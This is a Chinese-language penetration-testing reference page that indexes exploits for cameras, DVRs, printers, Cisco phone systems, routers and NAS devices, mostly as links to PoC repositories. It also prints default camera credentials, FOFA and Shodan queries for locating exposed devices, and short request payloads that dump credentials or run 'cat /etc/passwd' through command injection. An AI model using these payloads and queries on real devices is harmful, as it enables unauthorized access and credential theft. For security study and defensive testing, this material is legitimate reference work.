Device-Exploits.md

Device-Exploits

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

硬件产品默认口令

• 硬件产品默认口令

---

CPU

Meltdown/Spectre

• 相关文章

  • An Explanation of the Meltdown/Spectre Bugs for a Non-Technical Audience
  • 简单谈谈近期的 Intel 处理器漏洞

• POC | Payload | exp

  • speed47/spectre-meltdown-checker
  • Eugnis/spectre-attack
  • turbo/KPTI-PoC-Collection
  • google/security-research-pocs
  • https://leaky.page/ - JavaScript编写的Spectre漏洞PoC，演示基于Web的Spectre攻击的可行性

PLATYPUS

• https://platypusattack.com/

---

Camera

RTSP 弱口令

• 华为 : rtsp://admin:HuaWei123@IP/LiveMedia/ch1/Media1
• 海康威视 主码流 : rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
• 海康威视 主码流 : rtsp://admin:12345@IP:554/MPEG-4/ch1/main/av_stream
• 海康威视 主码流 : rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
• 海康威视 子码流 : rtsp://admin:12345@IP/mpeg4/ch1/sub/av_stream
• 海康威视 子码流 : rtsp://admin:12345@IP/h264/ch1/sub/av_stream
• 宇视 主码流 : rtsp://admin:admin@IP:554/video1
• 宇视 子码流 : rtsp://admin:admin@IP:554/video2
• 宇视 三码流 : rtsp://admin:admin@IP:554/video3

海康威视

相关工具

• 4n4nk3/HikPwn

CVE-2017-7921

• 相关文章

  • Hikvision海康威视摄像头CVE-2017-7921漏洞解析

• POC | Payload | exp

  • WormChickenWizard/hikvision-decrypter

CVE-2021-36260

• POC | Payload | exp
  • TaroballzChen/CVE-2021-36260-metasploit

DVR

CVE-2018-9995

• POC | Payload | exp

  curl "http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
  

  • ezelf/CVE-2018-9995_dvr_credentials

Dahua

CVE-2017-7925

• 相关文章
  • 摄像头漏洞实验
  • 大华摄像头backdoor，漏洞？
  • exploit - dahua camera backdoor_Nixawk

CVE-2021-33044 & CVE-2021-33045

• 相关文章

  • 大华摄像头 CVE-2021-33044-CVE-2021-33045 POC
  • 天王级视频监控产品某华认证绕过漏洞CVE-2021-330*复现与分析

• 相关工具

  • mcw0/DahuaConsole

D-Link

CVE-2020-25078 DCS系列监控账号密码信息泄露

• POC | Payload | exp

  /config/getuser?index=0
  

VideoIQ

VideoIQ Camera - Local File Disclosure

• POC | Payload | exp
  • https://www.exploit-db.com/exploits/40284

---

Printer

相关文章

• How to make 60,000 printers print whatever you want
• An Introduction to Printer Exploitation
• Researching The FAX Machine Attack Surface | X41 D-SEC GmbH
• 一个传真接管你的网络：含有传真功能的打印机漏洞分析
• 打印机PCL漏洞原理分析

资源

• Hacking Printers

相关工具

• PRET

  # Installation
  git clone https://github.com/RUB-NDS/PRET.git
  cd PRET
  
  pip install colorama pysnmp
  
  # Usage
  python2 ./pret.py
  python2 ./pret.py xxx.xxx.xxx.xxx pjl
  python2 ./pret.py xxx.xxx.xxx.xxx ps
  python2 ./pret.py xxx.xxx.xxx.xxx pcl

---

SIP / VoIP

相关文章

• Practical VoIP Penetration Testing

Cisco Unified Communications Manager

fofa: product=="CISCO-UCM" shodan: http.html:"Cisco Unified Communications Manager"

用户名泄漏

/cucm-uds/users

• 相关文章
  • Unauthenticated Dumping of Usernames via Cisco Unified Call Manager (CUCM)

ConfigFileCacheList.txt 泄漏

部分 CUCM 服务器在端口 TCP/6970 上有一个 HTTP 服务,其中存在 ConfigFileCacheList.txt 文件,包含位于 TFTP 目录中的所有文件名.

x.x.x.x:6970/ConfigFileCacheList.txt

• 相关文章

  • SEEYOUCM-THIEF: EXPLOITING COMMON MISCONFIGURATIONS IN CISCO PHONE SYSTEMS

• 相关工具

  • trustedsec/SeeYouCM-Thief
  • llt4l/iCULeak.py

CVE-2019-15972 Authenticated SQLi

• 相关文章

  • Cisco UCM软件中的SQL注入

• POC | Payload | exp

  • FSecureLABS/Cisco-UCM-SQLi-scripts

---

Router / Switch

漏洞库

• Routerpwn - One click exploits, generators, tools, news, vulnerabilities, poc, alerts

资源

• libc0607/Realtek_switch_hacking

漏洞利用框架

• routersoloit

  Installation

  git clone https://www.github.com/threat9/routersploit.git
  cd routersploit
  python3 -m pip install -r requirements.txt
  python3 rsf.py

  Usage

  use scanners/autopwn
  set target
  run

相关工具

• RouterPassView

CISCO

相关文章

• cisco设备信息泄漏漏洞案例

CVE-2017-6736 Cisco IOS remote code execution

• 简介

  Cisco IOS 和 IOS XE 都是美国思科（Cisco）公司为其网络设备开发的操作系统。Simple Network Management Protocol（SNMP）subsystem 是其中的一个用于网络设备管理信息交换的简单网络管理子系统。

  Cisco IOS 12.0 版本至 12.4 版本、15.0 版本至 15.6 版本和 IOS XE 2.2 版本至 3.17 版本中的 SNMP 子系统中存在安全漏洞。远程攻击者可通过向受影响系统发送特制的 SNMP 数据包利用该漏洞在受影响的系统上执行任意代码或造成系统重启。以下版本受到影响：SNMP 1版本，2c版本，3版本。

• 影响版本

  • Cisco:Ios:12.0(28a):::
  • Cisco:Ios:12.1(19)ec:::
  • Cisco:Ios:12.2(14)s13:::
  • Cisco:Ios:12.1(19)e7:::
  • Cisco:Ios:12.2(14)s12:::

• POC | Payload | exp

  • artkond/cisco-snmp-rce

CVE-2018-0171 Cisco Smart Install远程代码执行漏洞

fofa: protocol="smi"

• 描述

  Cisco SMI 是一种即插即用功能，可为 Cisco 交换机提供零接触部署并在 TCP 端口 4786 上进行通信。

• 相关文章

  • CISCO HACKERY: CONFIGURATION FILE DOWNLOAD
  • CVE-2018-0171 Cisco Smart Install远程代码执行漏洞分析

• POC | Payload | exp

  • frostbits-security/SIET - Smart Install Exploitation Tool
  • ChristianPapathanasiou/CiscoSmartInstallExploit
  • frostbits-security/ccat - Cisco Config Analysis Tool

    git clone https://github.com/frostbits-security/ccat.git && cd ccat && pip3 install -r requirements.txt
    python3 ccat.py [configuration_file]

CVE-2019-1652 && CVE-2019-1653 Cisco RV320

fofa: app="CISCO-RV320”

• POC | Payload | exp
  • https://seclists.org/fulldisclosure/2019/Jan/54
  • https://seclists.org/fulldisclosure/2019/Jan/52
  • 0x27/CiscoRV320Dump - CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit! (bug很多)

Type7密码解密

• https://www.xiaopeiqing.com/cisco-password-cracker/
• http://www.ifm.net.nz/cookbooks/passwordcracker.html
• http://www.toolsxx.com/code/cisco.php

h3c

相关工具

• grutz/h3c-pt-tools - Huawei/H3C/HP Penetration Testing Tools

密文解密

• https://raw.githubusercontent.com/grutz/h3c-pt-tools/master/hh3c_cipher.py
• http://blog.emaze.net/2012/11/weak-password-encryption-on-huawei.html

小米

CVE-2019-18370

• 简介

  Xiaomi Mi WiFi R3G 是中国小米科技（Xiaomi）公司的一款 3G 路由器。

  Xiaomi Mi WiFi R3G 2.28.23-stable 之前版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。

• 影响版本

  • Mi:Millet_router_3g:-:::*

• POC | Payload | exp

  • Xiaomi_Mi_WiFi_R3G_Vulnerability_POC

CVE-2019-18371

• 简介

  Xiaomi Mi WiFi R3G 2.28.23-stable 之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

• 影响版本

  • Mi:Millet_router_3g:-:::*

• POC | Payload | exp

  • Xiaomi_Mi_WiFi_R3G_Vulnerability_POC

OpenWrt

CVE-2019-12272 OpenWrt 图形化管理界面 LuCI 命令注入

• 简介

  OpenWrt LuCI 是一款用于 OpenWrt（Linux 发行版）的图形化配置界面。

  OpenWrt LuCI 0.10 及之前版本中的 admin/status/realtime/bandwidth_status 和 admin/status/realtime/wireless_status 端点存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中，网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

• 影响版本

  • Openwrt:Luci:0.10.0:::

• 相关文章

  • CVE-2019-12272 OpenWrt图形化管理界面LuCI命令注入分析

• POC | Payload | exp

  • HACHp1/LuCI_RCE_exp

Netlink

Netlink GPON Router 1.0.11 - Remote Code Execution

• 相关文章

  • 多款光纤路由器设备在野0-day漏洞简报

• POC | Payload | exp

  • Netlink GPON Router 1.0.11 - Remote Code Execution

ruijie

CNVD-2021-09650 EWEB网管系统命令执行 /guest_auth/guestIsUp.php

• FOFA: title:锐捷网络-EWEB网管系统
• POC | Payload | exp
  • yumusb/EgGateWayGetShell_py

CNVD-2021-14536 锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞

• FOFA: title="RG-UAC登录页面" && body="admin"
• 相关文章
  • https://www.cnblogs.com/cHr1s/p/14499858.html

NBR路由器CLI命令执行漏洞 /WEB_VMS/LEVEL15/

• FOFA: title="锐捷网络 --NBR路由器--登录界面"
• POC | Payload | exp
  • https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md

锐捷网关（RG-EG）信息泄露管理员账号密码+RCE

• 简介

  登陆后可配合 /cli.php?a=shell 执行命令,body为 notdelay=truecommand=cat /etc/passwd

• FOFA: app="Ruijie-EG易网关"

• POC | Payload | exp

  • chaitin/xray#1214
  • https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ
  • https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  • https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  • https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20branch_passw.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.md

锐捷EG易网关 phpinfo.view.php 信息泄露漏洞

• POC | Payload | exp

  /tool/view/phpinfo.view.php
  

Samsung

三星 WLAN AP WEA453e路由器远程命令执行

• FOFA: title=="Samsung WLAN AP"
• POC | Payload | exp

  POST /(download)/tmp/a.txt HTTP/1.1
  
  command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
  

飞鱼星

权限绕过信息泄露漏洞

• FOFA: title="飞鱼星企业级智能上网行为管理系统"
• FOFA: title="飞鱼星家用智能路由"
• 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞

iKuai

相关文章

• 爱快流控路由最新版(iKuai8_2.4.4_Build20150604-17_41)固件漏洞挖掘分析之一
• iKuai8 爱快软路由后台构造页面执行任意Linux命令

SQL注入漏洞

• iKuai 流控路由 SQL注入漏洞
• http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/iKuai/iKuai%20%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
• http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2015-0123161
• http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2015-0123224
• http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0188867

D-Link

CVE-2019-17506 D-Link Dir-645 getcfg.php 账号密码泄露漏洞

• POC | Payload | exp

  POST /getcfg.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  
  SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
  

DrayTek

CVE-2020-8515

• CVE-2020-8515 漏洞分析与利用

Netgear

Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities

• POC | Payload | exp
  • https://www.exploit-db.com/exploits/33177

TP-Link

CVE-2021-41653 TL-WR840N rce

• 相关文章

  • TP-Link TL-WR840N 远程命令执行漏洞（CVE-2021-41653）
  • TP-Link TL-WR840N EU v5 Remote Code Execution

• POC | Payload | exp

  • ohnonoyesyes/CVE-2021-41653

GPON

fofa: app="DZS-ZNID-GPON-Router"

CVE-2018-10562

• 相关文章

  • Critical RCE Vulnerability Found in Over a Million GPON Home Routers

• POC | Payload | exp

  • f3d0x0/GPON

---

NAS

ZyXel NAS

CVE-2022-34747 格式化字符串漏洞

• 相关文章
  • CVE-2022-34747 ZyXel NAS设备格式化字符串漏洞分析与复现